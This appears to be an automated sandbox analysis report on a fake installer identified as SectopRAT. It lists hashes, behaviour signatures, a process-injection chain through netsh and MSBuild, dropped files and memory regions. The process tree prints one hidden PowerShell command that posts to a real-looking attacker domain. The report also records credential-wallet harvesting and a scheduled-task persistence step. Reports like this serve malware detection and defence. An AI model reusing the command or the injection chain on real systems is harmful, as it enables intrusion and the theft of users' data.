Analysis
-
max time kernel
1788s -
max time network
1792s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
-
submitted
21-05-2024 21:10
General
-
Target
SetupSuite_2024.24230_win64.exe
-
Size
18.4MB
-
MD5
94dc7cce9cd15f55fb3f289bd723f567
-
SHA1
5487cd6f476b90b544754f017329d9894d6513e3
-
SHA256
78eea64a981219170ff45c927d11747c4c4d0f2baf0ebccef02e4fa82ea15007
-
SHA512
3760f2e225e7919bd4f3a2a9cd0e5eead3cc409c6f44eaa3d7a44fe2639de749f0640b19b8997ac53679c5b824c05d6d5ae3b9105c0c63efbc1cecda345d28cb
-
SSDEEP
393216:GZRCQ9WLcKS1wNLH04sjYyQ0KSW9MoEvwyhWgJcgtE6W:ioQHargYyWSpvwPgJc4xW
Malware Config
Signatures
-
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
-
SectopRAT payload 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 10 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious use of SetThreadContext 21 IoCs
-
Drops file in Windows directory 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 48 IoCs
-
Suspicious behavior: MapViewOfSection 31 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\SetupSuite_2024.24230_win64.exe"C:\Users\Admin\AppData\Local\Temp\SetupSuite_2024.24230_win64.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start /min "" "C:\Users\Admin\AppData\Roaming\Hhs_client_4\UZPWVFRAFQUTYVI\st.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Hhs_client_4\UZPWVFRAFQUTYVI\st.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "try { Invoke-RestMethod 'https://fvruq7f3npuzx535.fieles-pro.online/__stat/7171717692/post.php' -Method Post -Body (@{source_id='drop1'} | ConvertTo-Json) -ContentType 'application/json' -Headers @{ 'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36' } } catch {}"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\SysWOW64\netsh.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tmpC350.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpC350.tmp.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\SysWOW64\netsh.exe5⤵
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exeC:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\SysWOW64\netsh.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
-
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exeC:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\SysWOW64\netsh.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
-
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exeC:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\SysWOW64\netsh.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
-
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exeC:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\SysWOW64\netsh.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
-
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exeC:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\SysWOW64\netsh.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
-
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exeC:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\SysWOW64\netsh.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
-
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exeC:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\SysWOW64\netsh.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
-
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exeC:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\SysWOW64\netsh.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
-
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exeC:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\SysWOW64\netsh.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.logFilesize
1KB
MD5a199bb80fd78806046bd2c3ba0e899ff
SHA18211d6d66dabb26b55c88bd6e1a162ac53652015
SHA25696669ecdd0f995f2ed7451f63c908763a7a1c48bd29aded0510b00d6fb2afd6e
SHA512a04a82bef6e1e8cadb4bf220731a12ad80dcde1490a4f009105cf33ae737f77d604d7926008f40743a0429099c6b53dae7a17f9d8583189ce9a705fc224be25f
-
C:\Users\Admin\AppData\Local\Temp\608aa830Filesize
1.4MB
MD5bb79b37303351aed686bafdbda965145
SHA129dfc99df03ebeba465887c1c93990244010701f
SHA256832bd77a59171267e41c2559bce0abd6c8a5d172367726dd289f3fc133beae29
SHA5126cb74f6fe35775c562cbf1c8126d633259e4b6077638fff57f70326bac8e3a0e6deaa7ca26de9bab6364cf88fa750bfb7c2af6cde82f73ed731989685b75de8a
-
C:\Users\Admin\AppData\Local\Temp\66cc0545Filesize
1.4MB
MD59de3cd2b9c48a6904659820165063ea1
SHA1fc4f6981ed24010a49efcaa9c47663d77d278482
SHA2568d6d270739515d937e6089d87029eeca89099a266db616685ec131f64952ef99
SHA512db898cf1307ac42bdee6d17ebec702354f1a46f8b67de0e63dc369e4bd81841d455d1f32e484548993eca7ac60230f98016a7a8714f069e46d8acdcd1ef1e249
-
C:\Users\Admin\AppData\Local\Temp\9373967dFilesize
947KB
MD5b067b9f4a268cf0826971f23945b22f3
SHA11c595559c194dd23a5a9e95a79ceb92286f9b7b9
SHA2569d0bb116194f6bc313879a6bf119060a881a440ba04f1c715e2ef964684e22b4
SHA51290b6213d3cfde4c6419b6dda239e499fc1f8f3ab3e033e5431c7f1bf4fe559599174ff54d343c2cb1fb578da6eb226d063f7211b9f308aae4b1b8abf5811939a
-
C:\Users\Admin\AppData\Local\Temp\95e4b9bcFilesize
716KB
MD5208acbc78bd28a42f006accb8187aefa
SHA13b8b058a0c4c28c61f6e8565d8fab81a8dc6a3c1
SHA25658a736dbd205975ecff6b4543c3872a202a33cb02af4ecd9f0e168c90e10ba0d
SHA512b7986e2e3e16334d71ecc405cef92ce00ed5302e0542e00436f988238c1394fa620e99065ee8a36e8d2bd4429bdecc73143b48ae6d49bb094ea87faec01d3854
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ekyld5qo.p5j.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\e480c79bFilesize
1.4MB
MD572993e7e3c5af44c913d7962140a4e5c
SHA1773ab61c014ae55a5da6b63e5b35561b625a516b
SHA2566bf0ecce691384bebdc7dee9cade9a02d0afabf0e516a8ce3078ffce9a649e4f
SHA512b7f28cbf819c8b3a0a39a53f88ca60e7855a7a460d230b076794be56b466a66b13242e98959ffaf149abb19e81842c3af0fc026105a7b9a5e7e84b5898820328
-
C:\Users\Admin\AppData\Local\Temp\tmp4D42.tmpFilesize
20KB
MD5a603e09d617fea7517059b4924b1df93
SHA131d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc
-
C:\Users\Admin\AppData\Local\Temp\tmp4D55.tmpFilesize
20KB
MD522be08f683bcc01d7a9799bbd2c10041
SHA12efb6041cf3d6e67970135e592569c76fc4c41de
SHA256451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457
SHA5120eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936
-
C:\Users\Admin\AppData\Local\Temp\tmpC350.tmp.exeFilesize
6.6MB
MD5064d9b8a16b733266a651332c622a54e
SHA1a15f053b71cda0497efdec08b4680267b936024d
SHA2568e723f79d696edac7fa9da08d07dd796b4fa6f56886a2f10ea66e618bf0273f1
SHA51218cee323ab07689c6e030d647f0296ec97a12af860fce2252d72d11f3f54c69aca266329fa58cf08213417fd0de54dfab7477a3d9923e83812470fa1b8c79110
-
C:\Users\Admin\AppData\Roaming\Hhs_client_4\UZPWVFRAFQUTYVI\st.batFilesize
2KB
MD54f67b284c4d47193e6406331981df83b
SHA111d2317531c89a4f7faf8c72fb1cc6abb169b56b
SHA2568e1ec3afa595402444206ca09edcc86247a50f7cd8a71be3f4928a34228ba168
SHA5129a3ca36bc10043f0684a05faad606efae2d9959015b30d454c7d1d907553d130a4dcca8fac811a204431b7c23a6512a83ba0a555eef7a312c9a2655ea4cc30f3
-
C:\Windows\Tasks\Ortos Launcher.jobFilesize
300B
MD53ab6175e9346145004cecbeb41c57d9a
SHA104e5e00fec1372c7a64d9cda864831f5f683d067
SHA256c02fb18b001c732957b47e38ebebb3d8629900fe2a3e5b8d9d72bb99f0fe3fd5
SHA51263f761bdb63b4d47df10d41a3ac4468cea3ccd83ba967edf0676c50099c0940ba09b6ecf8ae55c9f524ba3544df07529f043fef155c4c5d511a68a286717d67b
-
memory/260-337-0x0000000072300000-0x0000000073617000-memory.dmpFilesize
19.1MB
-
memory/720-354-0x0000000072300000-0x0000000073617000-memory.dmpFilesize
19.1MB
-
memory/1356-381-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/1356-382-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/1356-383-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/1356-375-0x0000000000400000-0x0000000000AC3000-memory.dmpFilesize
6.8MB
-
memory/1392-34-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/1548-387-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/1612-22-0x00007FFB6FC80000-0x00007FFB70742000-memory.dmpFilesize
10.8MB
-
memory/1612-12-0x00007FFB6FC83000-0x00007FFB6FC85000-memory.dmpFilesize
8KB
-
memory/1612-26-0x0000026D45280000-0x0000026D457A8000-memory.dmpFilesize
5.2MB
-
memory/1612-29-0x00007FFB6FC80000-0x00007FFB70742000-memory.dmpFilesize
10.8MB
-
memory/1612-13-0x0000026D44540000-0x0000026D44562000-memory.dmpFilesize
136KB
-
memory/1612-25-0x0000026D44B80000-0x0000026D44D42000-memory.dmpFilesize
1.8MB
-
memory/1612-24-0x00007FFB6FC80000-0x00007FFB70742000-memory.dmpFilesize
10.8MB
-
memory/1612-23-0x00007FFB6FC80000-0x00007FFB70742000-memory.dmpFilesize
10.8MB
-
memory/2156-409-0x0000000000400000-0x0000000000AC3000-memory.dmpFilesize
6.8MB
-
memory/2260-330-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/2260-324-0x0000000000400000-0x0000000000AC3000-memory.dmpFilesize
6.8MB
-
memory/2260-331-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/2260-332-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/2312-353-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/2484-106-0x0000000007490000-0x00000000074A2000-memory.dmpFilesize
72KB
-
memory/2484-74-0x00000000059F0000-0x0000000005A66000-memory.dmpFilesize
472KB
-
memory/2484-75-0x0000000005A70000-0x0000000005AC0000-memory.dmpFilesize
320KB
-
memory/2484-76-0x0000000005960000-0x000000000596A000-memory.dmpFilesize
40KB
-
memory/2484-77-0x0000000006B20000-0x000000000704C000-memory.dmpFilesize
5.2MB
-
memory/2484-78-0x0000000006660000-0x000000000667E000-memory.dmpFilesize
120KB
-
memory/2484-79-0x0000000006730000-0x0000000006796000-memory.dmpFilesize
408KB
-
memory/2484-73-0x0000000005BC0000-0x0000000005D82000-memory.dmpFilesize
1.8MB
-
memory/2484-72-0x0000000005F00000-0x00000000064A6000-memory.dmpFilesize
5.6MB
-
memory/2484-103-0x0000000008410000-0x000000000841A000-memory.dmpFilesize
40KB
-
memory/2484-70-0x0000000001300000-0x00000000013C6000-memory.dmpFilesize
792KB
-
memory/2484-267-0x0000000005B20000-0x0000000005B32000-memory.dmpFilesize
72KB
-
memory/2484-268-0x0000000005DD0000-0x0000000005E0C000-memory.dmpFilesize
240KB
-
memory/2484-66-0x0000000072300000-0x0000000073617000-memory.dmpFilesize
19.1MB
-
memory/2484-71-0x0000000005890000-0x0000000005922000-memory.dmpFilesize
584KB
-
memory/2700-63-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/2712-348-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/2712-347-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/2712-349-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/2712-341-0x0000000000400000-0x0000000000AC3000-memory.dmpFilesize
6.8MB
-
memory/2756-307-0x0000000000400000-0x0000000000AC3000-memory.dmpFilesize
6.8MB
-
memory/2756-313-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/2756-314-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/2756-315-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/2984-301-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/3264-371-0x0000000072300000-0x0000000073617000-memory.dmpFilesize
19.1MB
-
memory/3384-320-0x0000000072300000-0x0000000073617000-memory.dmpFilesize
19.1MB
-
memory/3804-364-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/3804-366-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/3804-365-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/3804-358-0x0000000000400000-0x0000000000AC3000-memory.dmpFilesize
6.8MB
-
memory/3808-38-0x0000000000BA0000-0x0000000000BA8000-memory.dmpFilesize
32KB
-
memory/3808-35-0x0000000072D20000-0x0000000074037000-memory.dmpFilesize
19.1MB
-
memory/3984-8-0x00007FFB70750000-0x00007FFB708CA000-memory.dmpFilesize
1.5MB
-
memory/3984-30-0x00007FFB70750000-0x00007FFB708CA000-memory.dmpFilesize
1.5MB
-
memory/3984-6-0x00007FFB70750000-0x00007FFB708CA000-memory.dmpFilesize
1.5MB
-
memory/3984-9-0x00007FFB70768000-0x00007FFB70769000-memory.dmpFilesize
4KB
-
memory/3984-10-0x00007FFB70750000-0x00007FFB708CA000-memory.dmpFilesize
1.5MB
-
memory/3984-0-0x0000000140000000-0x0000000140445000-memory.dmpFilesize
4.3MB
-
memory/4088-400-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/4088-399-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/4088-398-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/4088-392-0x0000000000400000-0x0000000000AC3000-memory.dmpFilesize
6.8MB
-
memory/4108-370-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/4280-303-0x0000000072300000-0x0000000073617000-memory.dmpFilesize
19.1MB
-
memory/4592-319-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/4644-59-0x00000000747E0000-0x000000007495D000-memory.dmpFilesize
1.5MB
-
memory/4644-58-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/4644-57-0x00000000747E0000-0x000000007495D000-memory.dmpFilesize
1.5MB
-
memory/4644-50-0x0000000000400000-0x0000000000AC3000-memory.dmpFilesize
6.8MB
-
memory/4812-404-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/4936-297-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/4936-289-0x0000000000400000-0x0000000000AC3000-memory.dmpFilesize
6.8MB
-
memory/4936-295-0x000000006EA10000-0x000000006EB8D000-memory.dmpFilesize
1.5MB
-
memory/4936-296-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB
-
memory/5072-336-0x00007FFB90E20000-0x00007FFB91029000-memory.dmpFilesize
2.0MB